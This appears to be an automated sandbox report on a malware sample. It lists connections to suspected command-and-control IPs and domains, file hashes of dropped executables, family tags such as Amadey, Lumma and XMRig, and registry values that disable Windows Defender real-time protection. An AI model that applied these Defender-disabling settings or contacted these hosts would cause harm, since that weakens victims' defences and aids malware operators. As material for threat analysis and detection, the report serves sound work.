"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2320.3.673695842\1448226716" -childID 2 -isForBrowser -prefsHandle 2816 -prefMapHandle 2812 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {28c756ef-ea48-4060-9f19-2399489af3df} 2320 "\\.\pipe\gecko-crash-server-pipe.2320" 2828 d5ff58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2320.4.1581879930\2108902196" -childID 3 -isForBrowser -prefsHandle 3564 -prefMapHandle 2848 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd8f0d83-6d68-4d10-b243-63335240bc6a} 2320 "\\.\pipe\gecko-crash-server-pipe.2320" 3576 1fbce358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2320.5.680923518\757878139" -childID 4 -isForBrowser -prefsHandle 3700 -prefMapHandle 3704 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f32c076-bcbc-485c-b44a-a6a32a77c5d5} 2320 "\\.\pipe\gecko-crash-server-pipe.2320" 3776 1fb55a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2320.6.1976883581\966569802" -childID 5 -isForBrowser -prefsHandle 3932 -prefMapHandle 3936 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a46490c3-68fd-4817-bc38-9d3849ddca9b} 2320 "\\.\pipe\gecko-crash-server-pipe.2320" 3920 1f970958 tab

Network

Country Destination Domain Proto
RU 185.215.113.43:80 185.215.113.43 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 atten-supporse.biz udp
US 172.67.165.166:443 atten-supporse.biz tcp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 se-blurry.biz udp
US 104.21.81.153:443 se-blurry.biz tcp
US 8.8.8.8:53 zinc-sneark.biz udp
US 172.67.136.167:443 zinc-sneark.biz tcp
RU 185.215.113.206:80 185.215.113.206 tcp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 172.67.153.96:443 dwell-exclaim.biz tcp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.173.74:443 formy-spill.biz tcp
N/A 127.0.0.1:49306 tcp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 104.21.43.156:443 dare-curbys.biz tcp
US 8.8.8.8:53 youtube.com udp
GB 216.58.213.14:443 youtube.com tcp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
GB 216.58.213.14:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 216.58.204.78:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 216.58.204.78:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 142.250.200.46:443 consent.youtube.com tcp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.200.46:443 consent.youtube.com udp
US 8.8.8.8:53 print-vexer.biz udp
US 104.21.35.246:443 print-vexer.biz tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
N/A 127.0.0.1:49333 tcp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.180.14:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.180.14:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4---sn-aigzrnsz.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
NL 92.63.197.221:80 tcp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 142.250.200.46:443 consent.youtube.com udp
NL 92.63.197.221:80 tcp
NL 92.63.197.221:80 tcp

Files

memory/3020-0-0x0000000000A80000-0x0000000000F2F000-memory.dmp

memory/3020-1-0x0000000077070000-0x0000000077072000-memory.dmp

memory/3020-2-0x0000000000A81000-0x0000000000AAF000-memory.dmp

memory/3020-3-0x0000000000A80000-0x0000000000F2F000-memory.dmp

memory/3020-4-0x0000000000A80000-0x0000000000F2F000-memory.dmp

memory/3020-5-0x0000000000A80000-0x0000000000F2F000-memory.dmp

\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 f25ddb78a2cc3b6442c52a3c4a2aa843
SHA1 52ba6df84b158bf917044fee22625d2a12202382
SHA256 ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4
SHA512 74c7900f42e3d9b5d490e4848c7d12832f14b245065e04baa96604f2ca91ea5e46318ea71e081ee266fc770a94413edc298516abf23ed9f6c7cd6e7a70b72f14

memory/3020-11-0x0000000000A80000-0x0000000000F2F000-memory.dmp

memory/2808-21-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/3020-19-0x0000000000A80000-0x0000000000F2F000-memory.dmp

memory/3020-22-0x0000000006E20000-0x00000000072CF000-memory.dmp

memory/2808-23-0x0000000000B01000-0x0000000000B2F000-memory.dmp

memory/2808-24-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2808-26-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2808-27-0x0000000000B00000-0x0000000000FAF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe

MD5 623d073b8d01e00cbb5294ff07fe238a
SHA1 c3aeeb4de6cd38209944e7a1c3ecaa3f411f8775
SHA256 ce50862f51244b9dce6dbde2bc96fa852cff8ca84b720797894a3f43f4e293ca
SHA512 dc1fe9e39173bfd1e2722125b1385cf8c15e2570b65c1d5acb320a70d073d39a1a25f3665a87ccb3b8a0aaf7b7e63edb21e8e3cd4c3ac27e9cda237b54979824

memory/2808-44-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2808-45-0x0000000006990000-0x00000000071F2000-memory.dmp

memory/2808-48-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2808-47-0x0000000006990000-0x00000000071F2000-memory.dmp

memory/2820-46-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-49-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2808-50-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2808-51-0x0000000000B00000-0x0000000000FAF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe

MD5 bd8e9783c400bd3e1062102ea7efc071
SHA1 5de634ac724beb913fc431da4474635969ef4579
SHA256 5892cf800275fb41ba0b88395a14bd8d1ddf35d7bbcdb0e064f7bec4b2eaa894
SHA512 84202fd36089564b54d010ac30508f8e97970802bfc0d87c4957c85f02b82fd4411f776dd1e44d5e78cc91ce9d00651341d69d2bc9f0c17bcc46d4fdf928bfaf

memory/1156-66-0x0000000000120000-0x00000000005C5000-memory.dmp

memory/2808-64-0x0000000006990000-0x0000000006E35000-memory.dmp

memory/2808-69-0x0000000006990000-0x00000000071F2000-memory.dmp

memory/2820-70-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe

MD5 f18df05d8617aecd511f2074dd84843c
SHA1 9203a2f1b90425ab15b5ca0785b9a406dd9ed37f
SHA256 c898a6d03e65d0e212cca04c6035c9c9a23cfe504f7e72179746709b0a12889a
SHA512 57c729f1f8b4956825e35a153b0a421324a284e688702da43a11eb2cb092aea46cd730e8099d633c54b3b0c212ce8d0a6dcb0a0b12aa4095105c4fb70b89caf1

memory/2808-88-0x0000000006990000-0x0000000006E8A000-memory.dmp

memory/2808-87-0x0000000006990000-0x00000000071F2000-memory.dmp

memory/1320-89-0x0000000000990000-0x0000000000E8A000-memory.dmp

memory/2808-91-0x0000000006990000-0x0000000006E8A000-memory.dmp

memory/2820-90-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-93-0x0000000006990000-0x0000000006E35000-memory.dmp

memory/2808-92-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/1320-95-0x0000000000990000-0x0000000000E8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe

MD5 4a113390d43e07f23b940f5395802b01
SHA1 7451bb1a01bb006b6a69449c45310c23a79ad900
SHA256 cf265dc6c405c9d0b3e48728139c6dac24a04840091a315c34b8f7852a2f517b
SHA512 b37c7a7eea7a992f363b8a58f069b13f4c8936f8cc2037e86c57fa5b56b3a7195d7816fd91db6e14f2bdbda30898e374b6dcc839adb94c475a7c19f50f9f9f02

memory/1156-104-0x0000000000120000-0x00000000005C5000-memory.dmp

memory/1156-111-0x0000000000120000-0x00000000005C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe

MD5 159fd820eec2647575a520c273e83c4c
SHA1 83d9f35adee5e6129083df1c035840e796496faa
SHA256 49bf2a693d8813f89a4cbea5e6d76f032f6120a40b5ccfb0d439f0eb23e24b39
SHA512 5fbc084b754c573147583c5be13a32f0a138a0e3b63edf5eedb8993c21585a32ed015e6eb564d411c90147789603a1a1b0532882394d1f2d39604b1260bef2ee

memory/2808-125-0x0000000006990000-0x0000000006C4C000-memory.dmp

memory/2924-132-0x0000000000BE0000-0x0000000000E9C000-memory.dmp

memory/2808-131-0x0000000006990000-0x0000000006E8A000-memory.dmp

memory/2924-137-0x0000000000BE0000-0x0000000000E9C000-memory.dmp

memory/2924-138-0x0000000000BE0000-0x0000000000E9C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\6eeb6934-d80f-4f0c-9497-b125dcd74e3c

MD5 4523cd8742530064ddc1d6fd41d80ded
SHA1 10b3ba9d147969bc996d290c885d3ebb56451dd1
SHA256 b7a463ce6bf51e273da151613e4a03fe3d4a24bac48913050b7293056827996b
SHA512 f6e5d1f79a0113226a4079ed64d9ee92c962a91f8f41515aaac6da1a946423eaf511c28676ea966d7b75286f7277b338a4906feca94d31a44bea289cd5caacf0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin

MD5 04c77941c36f2f13f1a4f2fded82b36a
SHA1 c6c4ad3c2c75331bcdb30008daeccb2de548f2d3
SHA256 de01abe3b6ffed4516b2a97aae89ce5f6eaf4acfbeac9114c8fff9ff726d75de
SHA512 68799da3db17699d0dca6b935044b99f98e1a5d56c305cc060abfba8fb6525dab11e4b07fe55ab55aeea7ff3f39eaa836d80a64295b6ed314d78217165ba4b30

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp

MD5 40c282cf99db16623bc3eb6030da670d
SHA1 0a122287288716f51ba653e330051feebe1c2fee
SHA256 9935e6223ef9f29396ab7c6e08e6eb8efed478663bbdcc9c3260eac531946b4c
SHA512 806d00fa30622c6aeab5d26918428ad627cdb04544ac0420ac608f8599055bf5dbed68074313f93328015f3e29aacedbcc1761de7e106de1207a8c2ca53b6bd1

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

MD5 b182349cdb981b524cc45a1945f61b5f
SHA1 f1b943220cd1f2ff7b423f14aecd3fb1a4c8810e
SHA256 e65a7bf35918530919cba715b96521343c7d5410ffe2634170ae46c1f9954803
SHA512 cec467faf8f279ae2b04d2c05c310f9ef5ab46458bb02526e0155238d5c868e3ba76c0d27c8a4d0df20209e618e5ee0f3dabf39727eec198e262d0c3bce1477e

memory/2820-259-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-277-0x0000000000B00000-0x0000000000FAF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab16BE.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar16FF.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/1156-313-0x0000000000120000-0x00000000005C5000-memory.dmp

memory/2808-319-0x0000000006990000-0x0000000006C4C000-memory.dmp

memory/2924-321-0x0000000000BE0000-0x0000000000E9C000-memory.dmp

memory/2924-329-0x0000000000BE0000-0x0000000000E9C000-memory.dmp

memory/2820-330-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-331-0x0000000000B00000-0x0000000000FAF000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4

MD5 49386863aae18ad8845d2b68861000c3
SHA1 83d029bdf86447f57a8c63a3f3acfd0e942e569a
SHA256 f96893c12059c5fa84191e3e3947dafe3505fba98e88abe42f0811d1c2a4c7e5
SHA512 7c61fc5a8fb07cb668aafad014894cf0c5bf2fee90639f23ff3ebdc9784202c3fcb3abcef2cbf9c3f07e0217997090a2e7f497eaf1f4c7b809b3ed4ec7e0d2ca

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

MD5 3bdbe154c2d5e5e8af755e5aff6db91b
SHA1 b8a1d1b357105d934fd908492e5ca109a9d594dc
SHA256 f3e0193b231fb43cdb7540ab7b48b80ec994694434340df55f7027b192031f47
SHA512 e5d4ea1f0e26404f2db9ecaeedb092f81dc0acaca1f956072f13939215819333bf220647f87fb815ec9bdcdaa4d9469d21343db2d402b46f948437fe817f8f0e

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

memory/2820-367-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

memory/2808-392-0x0000000000B00000-0x0000000000FAF000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

MD5 90fbfe935c6d71b18efc1594c552eac7
SHA1 c48af567fb31cf76dd737479f9253d5c79e58a83
SHA256 a0dfd17424e9994051ed3744fc600d1712a082fa100ba2da7c3b348d4824db06
SHA512 97fd7245197c362325c4f7c79f7c8a25b90b1363f0289296a96272617be1f5c48e6286f2d59d938e8ea7863a00232ad448187292d32ec12ed32be628e9e1bdfd

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js

MD5 a6930b1f3a11cd4d90b521e3616792ad
SHA1 b36891b8ce86382a5c5b13076b17af15f238d0cd
SHA256 eeb137d3b8d5ca8c3e1f51bac7e018b2f70b333a1bfe3eb4ba8dd50b6738a6a0
SHA512 e8b4ffc57cfe95a38dd01b933efbed6e22f8324615a997a178c58f78d79ec4132ea8cfed34415f0424432a7053668a9d8876b210c89d32e495f1ec7e44d5c937

memory/2808-429-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-430-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-432-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-433-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-434-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-435-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-446-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-447-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-448-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-449-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-450-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-451-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-452-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-453-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-454-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-455-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-456-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-457-0x0000000000400000-0x0000000000C62000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-06 03:17

Reported

2024-12-06 03:20

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

156s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A

Orcus

rat spyware stealer orcus

Orcus family

orcus

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3664 created 3464 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\Explorer.EXE

TA505

ta505

Ta505 family

ta505

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Orcurs Rat Executable

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
